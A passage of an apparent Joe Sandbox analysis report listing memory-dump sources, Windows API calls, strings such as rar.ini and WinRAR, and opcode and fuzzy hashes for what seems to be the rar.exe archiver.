                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381304156.00007FF61864A000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381304156.00007FF618654000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381304156.00007FF61865E000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381304156.00007FF618666000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381439789.00007FF618668000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381499110.00007FF61866E000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_103_2_7ff6185c0000_rar.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: swprintf
                                                                                                                                                                                                                                                              • String ID: rar.ini$switches=$switches_%ls=
                                                                                                                                                                                                                                                              • API String ID: 233258989-2235180025
                                                                                                                                                                                                                                                              • Opcode ID: 7d70d85aa57c4b2adeedb5d1110c6c2e0691d0eb838de4c05f034f10faa9e0d3
                                                                                                                                                                                                                                                              • Instruction ID: c7befb200c21376ca6e40a1e1cd0e389a1bc382d5761eafd3a7fba6580115eac
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7d70d85aa57c4b2adeedb5d1110c6c2e0691d0eb838de4c05f034f10faa9e0d3
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E3419C22A18E8281EB50DB31D8501B927E0FB54BB4F400235EE9D87AD6EF3CE546C398

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000067.00000002.2381138003.00007FF6185C1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6185C0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381104736.00007FF6185C0000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381200345.00007FF618630000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381239083.00007FF618648000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381271413.00007FF618649000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381304156.00007FF61864A000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381304156.00007FF618654000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381304156.00007FF61865E000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381304156.00007FF618666000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381439789.00007FF618668000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381499110.00007FF61866E000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_103_2_7ff6185c0000_rar.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: AddressHandleModuleProcsetbuf$ErrorLibraryLoadModeVersion
                                                                                                                                                                                                                                                              • String ID: rar.lng
                                                                                                                                                                                                                                                              • API String ID: 553376247-2410228151
                                                                                                                                                                                                                                                              • Opcode ID: da8370b5298aa504e96f4bedb37cf3b824543d1dd7ee1d37a7dea72557966179
                                                                                                                                                                                                                                                              • Instruction ID: 8652f893ac4d244db4085d7bc59611af2c07276e55370e829c714d3c288a1b39
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: da8370b5298aa504e96f4bedb37cf3b824543d1dd7ee1d37a7dea72557966179
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DB419D21E08E8746FB90AB30A8511B927A1DF91FB4F480235E90ECB2D7DE2DE4059798

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • SHGetMalloc.SHELL32(?,00000800,?,00007FF6185F4432,?,?,?,?,00000800,00000000,00000000,00007FF6185F38CB,?,?,?,00007FF6185F41EC), ref: 00007FF6185F40C4
                                                                                                                                                                                                                                                              • SHGetSpecialFolderLocation.SHELL32(?,?,?,?,00000800,00000000,00000000,00007FF6185F38CB,?,?,?,00007FF6185F41EC), ref: 00007FF6185F40DF
                                                                                                                                                                                                                                                              • SHGetPathFromIDListW.SHELL32 ref: 00007FF6185F40F1
                                                                                                                                                                                                                                                                • Part of subcall function 00007FF6185E3458: CreateDirectoryW.KERNEL32(00000800,00000000,?,00007FF6185F413F,?,?,?,?,00000800,00000000,00000000,00007FF6185F38CB,?,?,?,00007FF6185F41EC), ref: 00007FF6185E34A0
                                                                                                                                                                                                                                                                • Part of subcall function 00007FF6185E3458: CreateDirectoryW.KERNEL32(00000800,00000000,?,00007FF6185F413F,?,?,?,?,00000800,00000000,00000000,00007FF6185F38CB,?,?,?,00007FF6185F41EC), ref: 00007FF6185E34D5
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000067.00000002.2381138003.00007FF6185C1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6185C0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381104736.00007FF6185C0000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381200345.00007FF618630000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381239083.00007FF618648000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381271413.00007FF618649000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381304156.00007FF61864A000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381304156.00007FF618654000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381304156.00007FF61865E000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381304156.00007FF618666000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381439789.00007FF618668000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381499110.00007FF61866E000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_103_2_7ff6185c0000_rar.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: CreateDirectory$FolderFromListLocationMallocPathSpecial
                                                                                                                                                                                                                                                              • String ID: WinRAR
                                                                                                                                                                                                                                                              • API String ID: 977838571-3970807970
                                                                                                                                                                                                                                                              • Opcode ID: 415bfa020dc0990cad3e0501dba2d99d0bb0d0c3ec71343b5049903f98ccb042
                                                                                                                                                                                                                                                              • Instruction ID: 78fbd92800949100078a51e405b4e797472ec9c07c662afae368635002318818
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 415bfa020dc0990cad3e0501dba2d99d0bb0d0c3ec71343b5049903f98ccb042
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E8214F16A08E4291EB509F32F9545BA6760FF99FF0B485031EF4E87766DE3CD4448744
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000067.00000002.2381138003.00007FF6185C1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6185C0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381104736.00007FF6185C0000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381200345.00007FF618630000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381239083.00007FF618648000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381271413.00007FF618649000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381304156.00007FF61864A000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381304156.00007FF618654000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381304156.00007FF61865E000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381304156.00007FF618666000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381439789.00007FF618668000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381499110.00007FF61866E000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_103_2_7ff6185c0000_rar.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ErrorLast$FileHandleRead
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 2244327787-0
                                                                                                                                                                                                                                                              • Opcode ID: 292f130439141af7737bd2c92edf84b453f5fe027529f60c064a2129a7dd684d
                                                                                                                                                                                                                                                              • Instruction ID: 5c66485f1d1212e547ae8428d89ea9f0849e6b7069a4689c1ebb1943ab5676a5
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 292f130439141af7737bd2c92edf84b453f5fe027529f60c064a2129a7dd684d
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 71215E21E48E4681EBA08A32E9003B9B6A4FB45FB6F104531E95DCB6C4CE2DD8448749
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000067.00000002.2381138003.00007FF6185C1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6185C0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381104736.00007FF6185C0000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381200345.00007FF618630000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381239083.00007FF618648000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381271413.00007FF618649000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381304156.00007FF61864A000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381304156.00007FF618654000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381304156.00007FF61865E000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381304156.00007FF618666000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381439789.00007FF618668000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381499110.00007FF61866E000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_103_2_7ff6185c0000_rar.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: AFUM$default.sfx
                                                                                                                                                                                                                                                              • API String ID: 0-2491287583
                                                                                                                                                                                                                                                              • Opcode ID: 9c5250dc79f526f8b88a1db49316f6b7f6f5dd8f7a69fa39e4eeb80febe8b362
                                                                                                                                                                                                                                                              • Instruction ID: 1d195576baf5742005ce613673bee18c833fccb1b692ea4e8bc557cc0c8d42fd
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9c5250dc79f526f8b88a1db49316f6b7f6f5dd8f7a69fa39e4eeb80febe8b362
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AC81B621A0CE8240FFB09B3195802FD2AA1EF51FA5F448231DE8D876D6DF6DA486C75C
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000067.00000002.2381138003.00007FF6185C1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6185C0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381104736.00007FF6185C0000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381200345.00007FF618630000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381239083.00007FF618648000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381271413.00007FF618649000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381304156.00007FF61864A000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381304156.00007FF618654000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381304156.00007FF61865E000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381304156.00007FF618666000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381439789.00007FF618668000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381499110.00007FF61866E000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_103_2_7ff6185c0000_rar.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Threadwcschr$CreateExceptionPriorityThrow
                                                                                                                                                                                                                                                              • String ID: CreateThread failed
                                                                                                                                                                                                                                                              • API String ID: 1217111108-3849766595
                                                                                                                                                                                                                                                              • Opcode ID: 23f25dd9d767684a47335cfb6564c8d2137849cd663ca384977e916ef4a87e16
                                                                                                                                                                                                                                                              • Instruction ID: e8ceab1d728775bbb51760c3d0eec3aa0f7148241139ff66f894b222981a9357
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 23f25dd9d767684a47335cfb6564c8d2137849cd663ca384977e916ef4a87e16
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 42113D31A08F4282EB15EF30F8411A97360FB84FA4F548131EA9D86769DF3CE946D788
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000067.00000002.2381138003.00007FF6185C1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6185C0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381104736.00007FF6185C0000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381200345.00007FF618630000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381239083.00007FF618648000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381271413.00007FF618649000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381304156.00007FF61864A000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381304156.00007FF618654000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381304156.00007FF61865E000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381304156.00007FF618666000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381439789.00007FF618668000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381499110.00007FF61866E000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_103_2_7ff6185c0000_rar.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: CriticalSection$EnterEventLeave
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3094578987-0
                                                                                                                                                                                                                                                              • Opcode ID: 8fe9f8176e207c020d906139d049f12966b7ba6a10f6a81758c5b7eb42f71044
                                                                                                                                                                                                                                                              • Instruction ID: 821ddeda32652c645420057810c8c934b74bbb58e4ddb0586e3273b4567bde0b
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8fe9f8176e207c020d906139d049f12966b7ba6a10f6a81758c5b7eb42f71044
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7EF06D22A0CE4683EB60DF31F5400BD6361FB89FB8F044230DE9D86669DF2CD9499B48
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000067.00000002.2381138003.00007FF6185C1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6185C0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381104736.00007FF6185C0000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381200345.00007FF618630000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381239083.00007FF618648000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381271413.00007FF618649000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381304156.00007FF61864A000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381304156.00007FF618654000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381304156.00007FF61865E000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381304156.00007FF618666000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381439789.00007FF618668000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381499110.00007FF61866E000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_103_2_7ff6185c0000_rar.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ConsoleFileHandleModeType
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 4141822043-0
                                                                                                                                                                                                                                                              • Opcode ID: b15bfddebd279c5c829c27adb93723b3551ef5d7968acfa0ad204a509e36213f
                                                                                                                                                                                                                                                              • Instruction ID: b05e8480350d777afffaf6a09721af94d762e680ac387e024d8b7357f10ed630
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b15bfddebd279c5c829c27adb93723b3551ef5d7968acfa0ad204a509e36213f
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: ACE0C220F04E0353FF988732A8651782251DF4DFA0F401074DC0FCA350EE2CD8898304
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000067.00000002.2381138003.00007FF6185C1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6185C0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381104736.00007FF6185C0000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381200345.00007FF618630000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381239083.00007FF618648000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381271413.00007FF618649000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381304156.00007FF61864A000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381304156.00007FF618654000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381304156.00007FF61865E000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381304156.00007FF618666000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381439789.00007FF618668000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381499110.00007FF61866E000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_103_2_7ff6185c0000_rar.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1703294689-0
                                                                                                                                                                                                                                                              • Opcode ID: dc222732d609072635a32a4c442b917d442ee89fc7b927a0b9cfc4e365035d5e
                                                                                                                                                                                                                                                              • Instruction ID: 554302ff8ad13548851b3b19046246969d71d18a0e34a17f444785d99de8b683
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: dc222732d609072635a32a4c442b917d442ee89fc7b927a0b9cfc4e365035d5e
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C2E09A24A08B5682EB54AB75998537933536F94F61F005478CC0E863D3CE3DA84D9395
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000067.00000002.2381138003.00007FF6185C1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6185C0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381104736.00007FF6185C0000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381200345.00007FF618630000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381239083.00007FF618648000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381271413.00007FF618649000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381304156.00007FF61864A000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381304156.00007FF618654000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381304156.00007FF61865E000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381304156.00007FF618666000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381439789.00007FF618668000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381499110.00007FF61866E000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_103_2_7ff6185c0000_rar.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: CharEnvironmentExpandStrings
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 4052775200-0
                                                                                                                                                                                                                                                              • Opcode ID: a3ba1b03603a475655284a6a52820d5ab219f11978c107c81e75b3572b44f527
                                                                                                                                                                                                                                                              • Instruction ID: b4cb553207a467db47bca10d3b56c8d2406ca753feb0a2e8463fbfce88fa4b05
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a3ba1b03603a475655284a6a52820d5ab219f11978c107c81e75b3572b44f527
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E9E1B622E18E8285EBA09F76D8801BDABA1FB51BB4F444131DB9D87AD9DF7CD481C704
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • CreateFileW.KERNELBASE(?,?,00000800,?,00000000,00007FF6185D7EBE,00000000,00000000,00000000,00000000,00000007,00007FF6185D7C48), ref: 00007FF6185E1B8D
                                                                                                                                                                                                                                                              • CreateFileW.KERNEL32(?,?,00000800,?,00000000,00007FF6185D7EBE,00000000,00000000,00000000,00000000,00000007,00007FF6185D7C48), ref: 00007FF6185E1BD7
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000067.00000002.2381138003.00007FF6185C1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6185C0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381104736.00007FF6185C0000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381200345.00007FF618630000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381239083.00007FF618648000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381271413.00007FF618649000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381304156.00007FF61864A000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381304156.00007FF618654000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381304156.00007FF61865E000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381304156.00007FF618666000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381439789.00007FF618668000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381499110.00007FF61866E000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_103_2_7ff6185c0000_rar.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: CreateFile
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 823142352-0
                                                                                                                                                                                                                                                              • Opcode ID: 4219d35e49beb692727e1c809157a61a389fcef5d2ea993dee933b1b68bc62b7
                                                                                                                                                                                                                                                              • Instruction ID: 98731b696ffd6b1b356af3d2312b7f60fa074ae077d6112c97084fc2fff47495
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4219d35e49beb692727e1c809157a61a389fcef5d2ea993dee933b1b68bc62b7
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9B312663A18E4546F7B09F31E8453A976A4EB90F79F104334DEAC866C5DF7CC4858748
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000067.00000002.2381138003.00007FF6185C1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6185C0000, based on PE: true
